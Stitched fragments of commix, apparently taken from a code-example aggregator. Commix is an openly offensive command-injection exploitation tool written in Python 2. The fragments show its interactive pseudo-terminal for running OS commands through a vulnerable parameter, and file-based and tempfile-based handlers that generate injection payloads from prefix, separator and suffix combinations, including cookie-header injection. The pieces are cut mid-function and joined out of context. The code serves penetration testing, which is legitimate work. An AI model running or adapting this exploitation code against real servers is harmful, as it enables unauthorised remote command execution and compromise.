print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
if not readline_error:
# Tab compliter
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
if go_back:
break
else:
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if shell != "":
# Update logs with executed cmds and execution results.
logs.executed_command(filename, cmd, shell)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
info_msg = "Executing the '" + cmd + "' command... "
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
elif settings.VERBOSITY_LEVEL > 1:
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_critical_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print settings.print_error_msg(err_msg)
raise
except:
info_msg = "Testing the " + technique + "... "
if settings.VERBOSITY_LEVEL > 1:
info_msg = info_msg + "\n"
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
break
elif gotshell in settings.CHOICE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOICE_QUIT:
raise SystemExit()
else:
err_msg = "'" + gotshell + "' is not a valid answer."
print settings.print_error_msg(err_msg)
continue
break
else:
continue
if no_result and settings.VERBOSITY_LEVEL < 2:
print ""
except urllib2.HTTPError, err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print "\n" + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
raise SystemExit()
示例13: tfb_injection_handler
#.........这里部分代码省略.........
break
elif file_access_again in settings.CHOISE_QUIT:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Check if defined single cmd.
if menu.options.os_cmd:
check_how_long, output = tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Exploirt injection result
tfb_injector.export_injection_results(cmd, separator, output, check_how_long)
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
try:
# Pseudo-Terminal shell
go_back = False
while True:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
if menu.options.verbose:
print ""
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
print ""
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Exploirt injection result
tfb_injector.export_injection_results(cmd, separator, output, check_how_long)
except KeyboardInterrupt:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
return True
elif gotshell in settings.CHOISE_QUIT:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
except KeyboardInterrupt:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例14: tfb_injection_handler
#.........这里部分代码省略.........
separator,
payload,
TAG,
cmd,
prefix,
suffix,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
filename,
)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(
separator,
payload,
TAG,
cmd,
prefix,
suffix,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
filename,
)
raise
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(
separator,
payload,
TAG,
cmd,
prefix,
suffix,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
filename,
)
return True
elif gotshell in settings.CHOISE_QUIT:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(
separator,
payload,
TAG,
cmd,
prefix,
suffix,
http_request_method,
url,
示例15: fb_injection_handler
def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response):
shell = False
counter = 1
vp_flag = True
exit_loops = False
no_result = True
is_encoded = False
stop_injection = False
call_tmp_based = False
next_attack_vector = False
export_injection_info = False
injection_type = "semi-blind command injection"
technique = "file-based command injection technique"
tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response)
if not settings.LOAD_SESSION or settings.RETEST == True:
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
info_msg = "Trying to create a file in '" + settings.WEB_ROOT
info_msg += "' for command execution results... "
print settings.print_info_msg(info_msg)
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for whitespace in settings.WHITESPACE:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# If a previous session is available.
if settings.LOAD_SESSION:
try:
settings.FILE_BASED_STATE = True
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
OUTPUT_TEXTFILE = TAG + ".txt"
session_handler.notification(url, technique, injection_type)
if technique == "tempfile-based injection technique":
#settings.LOAD_SESSION = True
tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response)
except TypeError:
err_msg = "An error occurred while accessing session file ('"
err_msg += settings.SESSION_FILE + "'). "
err_msg += "Use the '--flush-session' option."
print settings.print_critical_msg(err_msg)
raise SystemExit()
if settings.RETEST == True:
settings.RETEST = False
from src.core.injections.results_based.techniques.classic import cb_handler
cb_handler.exploitation(url, timesec, filename, http_request_method)
if not settings.LOAD_SESSION:
i = i + 1
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Check if defined "--verbose" option.
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print settings.print_info_msg(info_msg)
print settings.print_payload(payload)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie header injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
#.........这里部分代码省略.........